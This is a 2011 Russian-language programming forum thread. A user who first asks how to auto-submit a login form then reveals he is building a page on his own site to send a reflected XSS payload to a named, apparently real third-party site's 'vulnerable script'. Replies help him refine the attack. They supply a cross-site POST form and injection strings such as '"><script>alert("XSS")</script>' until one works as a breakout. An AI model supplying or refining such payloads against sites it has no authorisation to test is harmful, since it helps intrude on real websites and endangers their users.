симулирование ввода значения в HТМL форму
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
симулирование ввода значения в HТМL форму - 2011-06-16 16:54:52.993333
|
|
|
Chaz
Сообщений: 15
Оценки: 0
Присоединился: 2011-05-29 18:30:14.986666
|
Здравствуйте, есть сайт с формой ввода, вот он http://freepvp.ru/index.php нужен скрипт, который находится на другом сайте, который будет симулировать переход по ссылке http://freepvp.ru/index.php после чего он должен вводить нужное мне значение в форму Логин, после чего он должен нажать на кнопку Войти, помогите кто чем может[sm=15.gif]
|
|
|
RE: симулирование ввода значения в HТМL форму - 2011-06-16 17:53:22.250000
|
|
|
AleksNEW
Сообщений: 1019
Оценки: 0
Присоединился: 2010-01-17 08:35:42.933333
|
Здравствуйте, ТС. Ваш пост равносилен вот этому: "Здравствуйте, есть сайт с формой ввода, вот он http://freepvp.ru/index.php. Дайте скрипт, я сам не хочу искать в гугле и пытаться что - то сделать сам." Суть ясна? Если нет - объясняю: Вы должны (точнее - Вам следует) поискать материал самому, постараться что - то сделать, попробовать (понимая то, что Вы делаете), а после чего, если что - то не получается - обратиться на форум с тем, что ИМЕННО у Вас не получается.
|
|
|
RE: симулирование ввода значения в HТМL форму - 2011-06-16 18:03:00.256666
|
|
|
Chaz
Сообщений: 15
Оценки: 0
Присоединился: 2011-05-29 18:30:14.986666
|
Спасибо, так и сделаем:)
|
|
|
RE: симулирование ввода значения в HТМL форму - 2011-06-16 18:51:27.293333
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
AleksNEW - молодец :)
|
|
|
RE: симулирование ввода значения в HТМL форму - 2011-06-16 21:20:58.840000
|
|
|
AleksNEW
Сообщений: 1019
Оценки: 0
Присоединился: 2010-01-17 08:35:42.933333
|
Chaz, не за что - удачи. Pupkin-Zade, благодарю.
|
|
|
RE: симулирование ввода значения в HТМL форму - 2011-06-17 14:03:29.806666
|
|
|
Chaz
Сообщений: 15
Оценки: 0
Присоединился: 2011-05-29 18:30:14.986666
|
Народ, после не долгих поисков в гугле, я разобрался чуток. Сделал такую же форму как и на уязвимом сайте, при нажатии кнопки Войти, данные с моего сайта передаются уязвимому скрипту на атакуемом сайте. Но возникла неожиданная проблема. Вот моя страничка с формой http://lawliet.hmsite.net/index.php . Но для того, чтобы отправить данные уязвимому скрипту, нужно сначала записать эти данные в форму Логин на моей страничке и нажать кнопку Войти. Как сделать, чтобы данные уже были в поле Логин. чтобы было достаточно только нажать на кнопку? quote:
<form action="http://freepvp.ru/index.php" method="POST"> Логин<br/> <div class="podinput"><input type="text" value="" name="login"></div><br/> Пароль<br/> <div class="podinput"><input type="password" name="pass"></div><br/> <div style="color:red;font-size:12px;"></div> <div style="margin-top:10px;"><input type="submit" name="log" value="войти"></div> </form> Я прописывал свое значение в переменную value, например quote:
value="\"><script>alert('XSS')</script>" но тогда этот скрипт выполняется сразу же после загрузки моей страницы, мне нужно чтобы он просто находился в поле Логин, и не выполнялся до нажатия кнопки и передачи данных уязвимому скрипту, как это сделать? м?
|
|
|
RE: симулирование ввода значения в HТМL форму - 2011-06-18 14:09:57.750000
|
|
|
db_ROST_db
Сообщений: 1
Оценки: 0
Присоединился: 2011-06-18 13:22:27.756666
|
<div class="podinput"><input type="text" value="<sсriрt>alert('XSS')</sсriрt>" name="login"></div><br/>
|
|
|
RE: симулирование ввода значения в HТМL форму - 2011-06-18 17:02:39.913333
|
|
|
Chaz
Сообщений: 15
Оценки: 0
Присоединился: 2011-05-29 18:30:14.986666
|
quote:
ORIGINAL: db_ROST_db <div class="podinput"><input type="text" value="<sсriрt>alert('XSS')</sсriрt>" name="login"></div><br/> дык передать нужно не quote:
<sсriрt>alert('XSS')</sсriрt> а quote:
"><sсriрt>alert('XSS')</sсriрt>
|
|
|
RE: симулирование ввода значения в HТМL форму - 2011-06-19 12:11:10.123333
|
|
|
ololo__schoolboy
Сообщений: 118
Оценки: 0
Присоединился: 2011-06-14 12:42:52.573333
|
А что мешает написать например quote:
"><sсriрt>if(document.domain == freepvp.ru) alert('XSS');</sсriрt>
|
|
|
RE: симулирование ввода значения в HТМL форму - 2011-06-19 12:22:50.236666
|
|
|
ololo__schoolboy
Сообщений: 118
Оценки: 0
Присоединился: 2011-06-14 12:42:52.573333
|
Изменяюсь бред написал
|
|
|
RE: симулирование ввода значения в HТМL форму - 2011-06-19 13:22:52.496666
|
|
|
ololo__schoolboy
Сообщений: 118
Оценки: 0
Присоединился: 2011-06-14 12:42:52.573333
|
о Йа ВеЛиКиЙ ГеНиЙ кУлЦхАцКеРсТвА XD quote:
<div class="podinput"><input type="text" value='"><sсriрt>alert("XSS")</sсriрt>' name="login"></div><br/>
|
|
|
RE: симулирование ввода значения в HТМL форму - 2011-06-19 14:25:33.010000
|
|
|
Chaz
Сообщений: 15
Оценки: 0
Присоединился: 2011-05-29 18:30:14.986666
|
АвЭ ВеЛиКаМу ГеНиЮ кУлХаЦкЕрСтВа хД
|
|
|
|
|